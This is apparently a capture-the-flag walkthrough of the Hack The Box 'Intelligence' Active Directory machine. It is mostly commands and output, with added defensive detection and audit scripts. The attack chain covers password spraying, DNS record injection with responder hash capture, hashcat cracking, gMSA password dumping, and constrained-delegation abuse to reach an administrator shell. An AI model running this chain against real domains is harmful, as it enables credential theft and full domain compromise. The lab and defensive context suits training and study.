Reconnaissance
Scan the target with nmap.
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-02-15 12:10:01Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after: 2022-04-19T00:43:16
| MD5: 7767 9533 67fb d65d 6065 dff7 7ad8 3e88
| SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
| SHA-256: 9131 08b8 dcbf 87da 770b 4067 4fbd 2b93 e5c5 3d00 1240 09b2 84e5 c49f 3886 867d
|_ssl-date: 2026-02-15T12:11:36+00:00; +7h00m00s from scanner time.
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after: 2022-04-19T00:43:16
| MD5: 7767 9533 67fb d65d 6065 dff7 7ad8 3e88
| SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
| SHA-256: 9131 08b8 dcbf 87da 770b 4067 4fbd 2b93 e5c5 3d00 1240 09b2 84e5 c49f 3886 867d
|_ssl-date: 2026-02-15T12:11:36+00:00; +7h00m00s from scanner time.
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-02-15T12:11:36+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after: 2022-04-19T00:43:16
| MD5: 7767 9533 67fb d65d 6065 dff7 7ad8 3e88
| SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
| SHA-256: 9131 08b8 dcbf 87da 770b 4067 4fbd 2b93 e5c5 3d00 1240 09b2 84e5 c49f 3886 867d
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after: 2022-04-19T00:43:16
| MD5: 7767 9533 67fb d65d 6065 dff7 7ad8 3e88
| SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
| SHA-256: 9131 08b8 dcbf 87da 770b 4067 4fbd 2b93 e5c5 3d00 1240 09b2 84e5 c49f 3886 867d
|_ssl-date: 2026-02-15T12:11:36+00:00; +7h00m00s from scanner time.
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49691/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49692/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49710/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49713/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Investigating TCP/80
Opening the site in a browser displays the following page.

Use ReconSpider to examine the links on the website.
┌──(kali㉿kali)-[~/opt/ReconSpider]
└─$ python3 ReconSpider.py http://intelligence.htb
Note: the results are written to results.json.
┌──(myenv)─(kali㉿kali)-[~/opt/ReconSpider]
└─$ cat results.json
{
  "emails": [
    "contact@intelligence.htb"
  ],
  "links": [
    "http://intelligence.htb/documents/2020-12-15-upload.pdf",
    "http://intelligence.htb/documents/2020-01-01-upload.pdf",
    "http://intelligence.htb#page-top",
    "http://intelligence.htb#!",
    "http://intelligence.htb#signup"
  ],
  "external_files": [
    "http://intelligence.htb/pdf",
    "http://intelligence.htb/documents/2020-01-01-upload.pdf",
    "http://intelligence.htb/documents/2020-12-15-upload.pdf",
    "http://intelligence.htb/css"
  ],
  "js_files": [
    "http://intelligence.htb/documents/jquery.min.js",
    "http://intelligence.htb/documents/bootstrap.bundle.min.js",
    "http://intelligence.htb/documents/scripts.js",
    "http://intelligence.htb/documents/jquery.easing.min.js",
    "http://intelligence.htb/documents/all.js"
  ],
  "form_fields": [],
  "images": [
    "http://intelligence.htb/documents/demo-image-02.jpg",
    "http://intelligence.htb/documents/demo-image-01.jpg"
  ],
  "videos": [],
  "audio": [],
  "comments": []
}
The PDFs that were found contain Lorem ipsum dummy text.
Because the PDFs are named following the pattern "YYYY-MM-DD-upload.pdf", enumerate the other files with a script.
Example Python script
#!/usr/bin/env python3
import datetime
import os

import requests

# Start and end dates
t = datetime.datetime(2020, 1, 1)
end = datetime.datetime(2021, 7, 4)

# Destination directory
save_dir = "downloaded_pdfs"
os.makedirs(save_dir, exist_ok=True)

# Request one candidate file name per day and keep the ones that exist
while t < end:
    url = t.strftime("http://intelligence.htb/documents/%Y-%m-%d-upload.pdf")
    resp = requests.get(url)
    if resp.status_code == 200:
        print(url)
        filename = t.strftime("%Y-%m-%d") + ".pdf"
        filepath = os.path.join(save_dir, filename)
        with open(filepath, 'wb') as f:
            f.write(resp.content)
    t += datetime.timedelta(days=1)
Convert the files downloaded above to text.
for file in *.pdf; do pdftotext "$file"; done
Grep the text files.
┌──(kali㉿kali)-[~/htb/intelligence/downloaded_pdfs]
└─$ grep -iE '(pass| pwd | token| secret| api| login| user)' *.txt
2020-06-04.txt:Please login using your username and the default password of:
2020-06-04.txt:After logging in please change your password as soon as possible.
"2020-06-04-upload.txt" contains the default password.
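Seen from the web server, the date walk above is one client requesting a long run of consecutive YYYY-MM-DD-upload.pdf names and mostly receiving 404s. The detection sketch below is an added example, not part of the original write-up; the log lines, client addresses, thresholds and the reduced IIS W3C field set are constructed assumptions.

```python
import datetime as dt
import re
from collections import defaultdict

DOC_RE = re.compile(r"^/documents/(\d{4}-\d{2}-\d{2})-upload\.pdf$", re.I)


def parse_w3c(lines):
    """Yield one dict per request, named after the columns in '#Fields:'."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def longest_run(days):
    """Length of the longest streak of consecutive calendar days."""
    best = run = 0
    prev = None
    for day in sorted(days):
        run = run + 1 if prev is not None and (day - prev).days == 1 else 1
        best = max(best, run)
        prev = day
    return best


def find_date_walkers(lines, min_run=14, min_miss_ratio=0.5):
    """Flag clients that walk the date-named documents and mostly miss."""
    seen = defaultdict(set)    # client IP -> distinct dates requested
    total = defaultdict(int)   # client IP -> requests matching the pattern
    misses = defaultdict(int)  # client IP -> 404 responses among those
    for rec in parse_w3c(lines):
        match = DOC_RE.match(rec.get("cs-uri-stem", ""))
        if not match:
            continue
        try:
            day = dt.date.fromisoformat(match.group(1))
        except ValueError:
            continue  # digits fit the pattern but are not a real date
        ip = rec.get("c-ip", "?")
        seen[ip].add(day)
        total[ip] += 1
        misses[ip] += rec.get("sc-status") == "404"
    alerts = {}
    for ip, days in seen.items():
        run, ratio = longest_run(days), misses[ip] / total[ip]
        if run >= min_run and ratio >= min_miss_ratio:
            alerts[ip] = {"distinct_dates": len(days), "longest_run": run,
                          "miss_ratio": round(ratio, 2)}
    return alerts


def build_sample():
    """Constructed log: one client walking 30 days, one ordinary visitor."""
    lines = ["#Software: Microsoft Internet Information Services 10.0",
             "#Fields: date time cs-method cs-uri-stem c-ip cs(User-Agent) sc-status"]
    published = {dt.date(2020, 1, 1), dt.date(2020, 1, 20)}  # constructed
    day = dt.date(2020, 1, 1)
    for i in range(30):
        status = 200 if day in published else 404
        lines.append(f"2021-07-04 10:00:{i:02d} GET /documents/{day}-upload.pdf "
                     f"192.0.2.10 python-requests/2.31.0 {status}")
        day += dt.timedelta(days=1)
    for name in ("2020-01-01", "2020-12-15"):  # the two linked PDFs
        lines.append(f"2021-07-04 11:00:00 GET /documents/{name}-upload.pdf "
                     f"192.0.2.20 Mozilla/5.0 200")
    return lines


if __name__ == "__main__":
    for client, detail in find_date_walkers(build_sample()).items():
        print(client, detail)
```

Detection only shortens the exposure window; documents that must stay private need access control rather than a hard-to-guess file name.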
Next, collect valid usernames.
Extract the usernames from the PDF files downloaded by the script.
exiftool *.pdf | grep Creator | awk -F ': ' '{ print $2 }'
Running crackmapexec with the list above and the default password reveals a valid account.
┌──(kali㉿kali)-[~/htb/intelligence]
└─$ crackmapexec smb 10.129.95.154 -u users.txt -p NewIntelligenceCorpUser9876 --continue-on-success
---snip---
SMB 10.129.95.154 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True)
SMB 10.129.95.154 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
---snip---
Obtaining the user flag
Access SMB with the account confirmed above.
user.txt is on Tiffany.Molina's Desktop.
┌──(kali㉿kali)-[~/htb/intelligence]
└─$ smbclient ////10.129.95.154 -U "Tiffany.Molina%NewIntelligenceCorpUser9876"
do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND)
┌──(kali㉿kali)-[~/htb/intelligence]
└─$ smbclient -L //10.129.95.154 -U Tiffany.Molina
Password for [WORKGROUP\Tiffany.Molina]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
IT Disk
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
┌──(kali㉿kali)-[~/htb/intelligence]
└─$ smbclient //10.129.95.154/Users -U Tiffany.Molina
Password for [WORKGROUP\Tiffany.Molina]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Mon Apr 19 10:20:26 2021
.. DR 0 Mon Apr 19 10:20:26 2021
Administrator D 0 Mon Apr 19 09:18:39 2021
All Users DHSrn 0 Sat Sep 15 16:21:46 2018
Default DHR 0 Mon Apr 19 11:17:40 2021
Default User DHSrn 0 Sat Sep 15 16:21:46 2018
desktop.ini AHS 174 Sat Sep 15 16:11:27 2018
Public DR 0 Mon Apr 19 09:18:39 2021
Ted.Graves D 0 Mon Apr 19 10:20:26 2021
Tiffany.Molina D 0 Mon Apr 19 09:51:46 2021
3770367 blocks of size 4096. 1459538 blocks available
smb: \>
Lateral movement
The IT share contains a script.
┌──(kali㉿kali)-[~/htb]
└─$ smbclient //10.129.95.154/IT -U Tiffany.Molina
Password for [WORKGROUP\Tiffany.Molina]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Apr 19 09:50:55 2021
.. D 0 Mon Apr 19 09:50:55 2021
downdetector.ps1 A 1046 Mon Apr 19 09:50:55 2021
3770367 blocks of size 4096. 1461366 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (1.4 KiloBytes/sec) (average 1.4 KiloBytes/sec)
smb: \>
The contents of the script are as follows.
┌──(kali㉿kali)-[~/htb/intelligence]
└─$ cat downdetector.ps1
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
This script runs every 5 minutes, sends an HTTP request to each host registered in Active Directory DNS whose name matches web*, and checks the status code.
Use dnstool to add a record to this zone that points to the Kali machine.
┌──(kali㉿kali)-[~/opt/krbrelayx]
└─$ python3 dnstool.py -u intelligence\\Tiffany.Molina -p NewIntelligenceCorpUser9876 --action add --record web-test --data 10.10.14.93 --type A intelligence.htb -dns-ip 10.129.95.154
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
Because the script sends its requests with -UseDefaultCredentials, listening with responder after adding the record captures Ted.Graves's credentials.
┌──(kali㉿kali)-[~/opt/krbrelayx]
└─$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] You don't have an IPv6 address assigned.
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.93]
Responder IPv6 [::1]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-FI6JFIMJPCB]
Responder Domain Name [BOL6.LOCAL]
Responder DCE-RPC Port [47724]
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events...
[!] Error starting UDP server on port 5355, check permissions or other servers running.
[!] Error starting UDP server on port 5353, check permissions or other servers running.
[!] Error starting UDP server on port 5355, check permissions or other servers running.
[!] Error starting UDP server on port 5353, check permissions or other servers running.
[HTTP] NTLMv2 Client : 10.129.95.154
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:d5ac614bcadda9bf...
Cracking the hash yields Ted.Graves's password.
hashcat -m 5600 hash.txt ./rockyou.txt
---snip---
TED.GRAVES::intelligence:d5ac614bcadda9bf:093108f3016da9bd7217be1edc128c0c:...:Mr.Teddy
---snip---
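downdetector.ps1 sends the scheduled task's credentials (-UseDefaultCredentials) to every web* name in the zone, so any such record that resolves outside the server networks deserves an alert. The audit below is an added example, not taken from the write-up or from any tool it uses; the record list, the approved network 10.129.95.0/24 and the function name are assumptions.

```python
import ipaddress
from fnmatch import fnmatchcase

# Constructed zone export: (record name, type, data). Only web-test and the
# DC address come from the walkthrough; the rest is made up for illustration.
SAMPLE_RECORDS = [
    ("web1", "A", "10.129.95.20"),
    ("web-test", "A", "10.10.14.93"),
    ("WEBMAIL", "CNAME", "mail.example.net."),
    ("webdocs", "CNAME", "dc.intelligence.htb."),
    ("dc", "A", "10.129.95.154"),
]


def audit_monitored_records(records, zone, allowed_nets, name_glob="web*"):
    """Return records the health check would contact that leave trusted space.

    A record is reported when its name matches the glob used by the script
    and it points at an address outside allowed_nets, or is an alias to a
    host outside the zone.
    """
    nets = [ipaddress.ip_network(n) for n in allowed_nets]
    zone_suffix = "." + zone.lower().rstrip(".")
    findings = []
    for name, rtype, data in records:
        # PowerShell's -like is case-insensitive, so compare the same way.
        if not fnmatchcase(name.lower(), name_glob.lower()):
            continue
        rtype = rtype.upper()
        if rtype in ("A", "AAAA"):
            try:
                addr = ipaddress.ip_address(data)
            except ValueError:
                findings.append((name, rtype, data, "unparseable address"))
                continue
            # Membership is False when IP versions differ, so an AAAA record
            # is reported unless an IPv6 network is explicitly approved.
            if not any(addr in net for net in nets):
                findings.append((name, rtype, data,
                                 "address outside approved networks"))
        elif rtype == "CNAME":
            target = data.lower().rstrip(".")
            if not ("." + target).endswith(zone_suffix):
                findings.append((name, rtype, data, "alias leaves the zone"))
    return findings


if __name__ == "__main__":
    for finding in audit_monitored_records(
            SAMPLE_RECORDS, "intelligence.htb", ["10.129.95.0/24"]):
        print(finding)
```

The same allow-list belongs in the health-check script itself, so that credentials are only offered to hosts the operator has approved.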
Collect domain information with the Ted.Graves account that was obtained.
┌──(kali㉿kali)-[~/htb]
└─$ sudo bloodhound-python -d intelligence.htb -u TED.GRAVES -p 'Mr.Teddy' -c all -ns 10.129.95.154 --zip
[sudo] kali のパスワード:
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: intelligence.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.intelligence.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Testing resolved hostname connectivity dead:beef::23b
INFO: Trying LDAP connection to dead:beef::23b
INFO: Testing resolved hostname connectivity dead:beef::e88e:e5ad:75e0:c5ce
INFO: Trying LDAP connection to dead:beef::e88e:e5ad:75e0:c5ce
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to GC LDAP server: dc.intelligence.htb
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Testing resolved hostname connectivity dead:beef::23b
INFO: Trying LDAP connection to dead:beef::23b
INFO: Testing resolved hostname connectivity dead:beef::e88e:e5ad:75e0:c5ce
INFO: Trying LDAP connection to dead:beef::e88e:e5ad:75e0:c5ce
INFO: Found 43 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.intelligence.htb
INFO: Done in 00M 57S
INFO: Compressing output into 20260218224013_bloodhound.zip
Ted.Graves is a member of the ITSupport group, and this group holds the ReadGMSAPassword right over SVC_INT.

A gMSA (group Managed Service Account) is a service account in an AD environment whose password is managed automatically.
gMSADumper can dump the password of any gMSA that the supplied account has the right to read.
┌──(myenv)─(kali㉿kali)-[~/opt/gMSADumper]
└─$ python3 gMSADumper.py -u 'TED.GRAVES' -p 'Mr.Teddy' -d intelligence.htb
Users or groups who can read password for svc_int$:
 > DC$
 > itsupport
svc_int$:::0d5463c6e805b0908b61e90cf9219dc3
svc_int$:aes256-cts-hmac-sha1-96:4bd3d5d159cf43ed1b1fdbf706b3899de4772a12cf5b206b4ec41663bda74956
svc_int$:aes128-cts-hmac-sha1-96:3a75bf4dc94d2f020c848f8c5f350530
Check the SVC_INT information in BloodHound.
AD has a mechanism called delegation, which lets a service impersonate another user in order to access a different service, and SVC_INT is permitted to access WWW/dc.intelligence.htb in this way.


Use impacket-getST to obtain a service ticket for the administrator.
If it fails with an error such as (Clock skew too great), synchronize the clock via NTP and run it again.
┌──(kali㉿kali)-[~/opt/gMSADumper]
└─$ impacket-getST -dc-ip 10.129.95.154 -spn www/dc.intelligence.htb -hashes :0d5463c6e805b0908b61e90cf9219dc3 -impersonate administrator intelligence.htb/svc_int
Impacket v0.14.0.dev0+20260109.161801.028f0724 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@www_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
Reference: NTP synchronization
Once the ticket has been obtained, access the host as the administrator.
┌──(kali㉿kali)-[~/opt/gMSADumper]
└─$ KRB5CCNAME=administrator@www_dc.intelligence.htb@INTELLIGENCE.HTB.ccache impacket-wmiexec -k -no-pass administrator@dc.intelligence.htb
Impacket v0.14.0.dev0+20260109.161801.028f0724 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
intelligence\administrator
C:\>
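The final steps succeed because svc_int$ may delegate to a service on the DC while the Administrator account is still delegable. The audit below is an added example, not from the original write-up, that checks exported account attributes for that combination; the sample accounts, their userAccountControl values and the gmsa_readers field are constructed.

```python
# userAccountControl bits (values documented by Microsoft)
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition (S4U2self)

# Constructed export. gmsa_readers is a hypothetical, already-resolved field
# holding who may read the gMSA password (DC$ and itsupport per the page).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc_int$",
     "userAccountControl": 0x1000 | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["WWW/dc.intelligence.htb"],
     "gmsa_readers": ["DC$", "itsupport"]},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200,
     "adminCount": 1},
    {"sAMAccountName": "adm.backup",
     "userAccountControl": 0x200 | NOT_DELEGATED, "adminCount": 1},
    {"sAMAccountName": "adm.tier0", "userAccountControl": 0x200,
     "adminCount": 1},
    {"sAMAccountName": "Ted.Graves", "userAccountControl": 0x200},
]


def delegation_kind(account):
    """Classify how an account is trusted for delegation, or None."""
    uac = account["userAccountControl"]
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if account.get("msDS-AllowedToDelegateTo"):
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "constrained+protocol-transition"
        return "constrained"
    return None


def is_delegable(account, protected_users):
    """True when a delegated ticket can be issued in this account's name."""
    if account["userAccountControl"] & NOT_DELEGATED:
        return False
    return account["sAMAccountName"].lower() not in protected_users


def audit_delegation(accounts, protected_users=()):
    """Pair every delegating account with the admins it could stand in for."""
    protected = {name.lower() for name in protected_users}
    exposed = sorted(a["sAMAccountName"] for a in accounts
                     if a.get("adminCount") == 1 and is_delegable(a, protected))
    report = []
    for account in accounts:
        kind = delegation_kind(account)
        if kind is None:
            continue
        report.append({
            "account": account["sAMAccountName"],
            "kind": kind,
            "targets": account.get("msDS-AllowedToDelegateTo", []),
            "password_readers": account.get("gmsa_readers", []),
            "delegable_admins": exposed,
        })
    return report


if __name__ == "__main__":
    for row in audit_delegation(SAMPLE_ACCOUNTS, protected_users=["adm.tier0"]):
        print(row)
```

An empty delegable_admins list is the target state: privileged accounts flagged as sensitive or placed in Protected Users cannot be impersonated through delegation.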
Other